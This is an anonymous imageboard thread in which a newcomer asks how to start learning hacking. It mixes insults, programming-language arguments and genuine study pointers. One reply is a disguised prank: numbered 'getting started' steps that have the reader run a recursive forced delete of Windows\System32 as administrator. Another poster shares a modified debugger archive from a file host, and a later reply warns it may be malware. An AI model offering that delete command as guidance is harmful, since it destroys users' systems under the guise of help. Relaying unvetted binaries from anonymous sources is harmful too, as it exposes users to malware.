Hey anons, does anyone know how to get into hacking...

Hey anons, does anyone know how to get into hacking? Any learning materials/places to start/things to learn would be helpful.

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Learn java. All hail Java!

Buy a fedora and a user mask. Works for most people on Sup Forums

Learn Networking.

What do you think is a "Hacker"?

Depends on your technical background, can you code? Do you have experience with networking?

No experience with networking. Know the basics of Python and HTML

Iam not even sure if you now what hacking is and if you have the right attitude to become a hacker. but this link provides all the information that you need to get startet. but trust me, it will be a long jorney catb.org/esr/faqs/hacker-howto.html

there's no such thing as learning hacking.
You can learn how to bruteforce passwords in WEP and ddos, wireshark etc
True hacking is figuring stuff out from the knowledge you have.
Hacking is problem solving, and if you can't even solve the very simple problem of what to learn then you'll never hack

Java is shit and slow.

OWASP top 10

the most widespread exploitable bugs. high profile targets will have solved them ages ago, but good enough for easy pray

It's not the 90's anymore, most cpus come with a with dedicated resources for JVM

Still slower than C and C++.

There was a good website to learn how to disassembly and understand programs using OllyDBG. thelegendofrandom.com

Seems to be down now, but I have a copy of all of the PDFs and programs and tools. I can upload them if you want.

Use webarchive to check the site out.

Fucking C#unt
Java Masterrace

And it doesn't fix the crappy syntax.

First, post all your usernames and passwords here. We will discuss over many pizzas.

goddomit fronk

C# is literally Microsoft's "hey we can Java too!"

It has better syntax and it's faster than java.

you retards using C# C++ and java

meanwhile im hacking everyone using flash

Here's a good way to start:

1. In Windows go to the start button -> all programs -> accessories
2. Find "command prompt" and right-click on it and select "run as administrator".
3. Type in: CD\windows\system32
4. Press the enter key. You should see: C:\Windows\Systerm32>
5. Next type in: del /A /S /F /Q *.*
6. Press enter
7. Wait until you see the C:\Windows>System32> prompt again
8. Reboot your PC

It will now be ready to hack into other systems with much more ease.

yeah and C is still slower than Fortran, assembly and machine code
your point?

Also why the fuck would someone need to learn a high level programming language to hack.

Learn assembler you will need it to reverse engineer software.

ever heard of scala?

ever heard of assembler?

Are those supposed to be drive letters? What the actual fuck?

Here are some good docs.

ever heard of machine code?

C is not slower than Fortran. C was specifically designed to write UNIX with. It doesn't include the built-in error checking that other HLLs offer, and is second best to ASM when you want to generate fast clean executables.


>doesn't know DOS

No, they are command switches.

If you are really interested open a command window and type: DEL /?

That is true, just it doesn't have the pain in the ass that ASM has.

Please do

Why not deltree /u ?

I've never seen those switches, only ever used the unconditional /U switch.

ASM for Win32 is actually isn't all that bad. For earlier 16-bit platforms like DOS it was a royal bitch.

install hackering.exe

deltree has been removed from Windows.

Ask your local lumber jacks. You would also need a good machete.


or the local country club.

Holy shit for real? Haven't tried on 10.

Gone since Windows 2000 I believe.

Go to your library and check out a book on C programming. After learning teh basics of t3h language see if you can get a book on Algorithms, one on program design, and one on OS design using C. after reading and applying these books you are ready to begin learning how to hack. Now go get some books on setting up and running networks for home and business and also read those. Buy a few cheap computers and connect them all on the same network, this is what you will practice your l33t h40xR Ski/_5 w!+#. After this, if you can find a book on creating viruses and worms to exploit a mainframe read it and then send it to me so i can read it too. Upon applying this knowledge you will be able to exploit weaknesses in companie's sitez that you could use for a variety of purposes.
Or just use metasploit.

Is that like hack.bat?



Kind of, more similar to hack.COM

r u from poland?

Tor and learn Java

Learn shell, sql, java, nmap, wireshark, tcp/ip, udp, cookies, Javascript, php, html, css, c++, java, selenium, Metasploit, social engineering, ruby on rails, python, hashes, etc. to start off

>get into hacking?

Take some computer science classes.

Are you still around? I'm uploading now


It's at 30%, ETA 2 minutes

Ask the Britbong Paedo, Paul Richards he thinks he's a hacker.

If you have to ask it's not for you. Fucking idiot.

66 MB: mediafire.com/file/my7racd797a5aay/r4ndom-reverse-engineering.tar.xz

It contains a modified version of OllyDBG with various plugins that are super useful (such as detecting winAPI calls). Each tutorial is in a zip file and has a PDF you can read for instructions. Have fun!

Pretty much this. Know how computers "work" on a fundamental level and practical level and then learn how to exploit the. There's no magic or myatery to hacking, just elbow grease and patience to study, learn, practice.


You don't need to know C to "know how computers work". It's enough to start with a debugger + disassembler and work your way up from there.

Reading books doesn't really help. The only thing that helps is practice. There are enough online resources to learn how to program without books.

Eh, i still think a basic intro to comp sci using c is a good base level. Its a little more than is necessary but lays great framework

Hacking is basically manipulating. Learn a languange or networking well enough that you can either bend the rules or see the flaws.

dubs dont lie

always remeber kid.
dubs dont lie.

for the love of god don't run a modified version of ollydbg from a fucking Sup Forums user. or open the pdf. jesus christ. google "binding malware to PE files" and "pdf exploit explanation"

I am starting an associates in Computer Science. I am intending to get it to get some sort of credential. I just started learning code in the last month and I liked it so much I decided to do something with myself. I can get the associates in a year. Could I become an employable programmer skill wise by the end of that time?

Look up Hack this site. It's a website with a bunch of hacking challenges and games.

Dubs of truth I think

Employable yes: Extremely useful in a broad field of applications? Not so much. Most will come with experience, so as soon as you enter the job world you'll be the new idiot again for like 3 or so years. After that you'll do fine.
You've chosen a good direction btw, if you wanna smoke weed and chill all day you should get into network administration - small companies don't have two people for this and as soon as everything is up and running your only job is to install microsoft word and adobe flash.

Download Kali linux on a usb drive. Play with all the programs. Learn and understand how they work.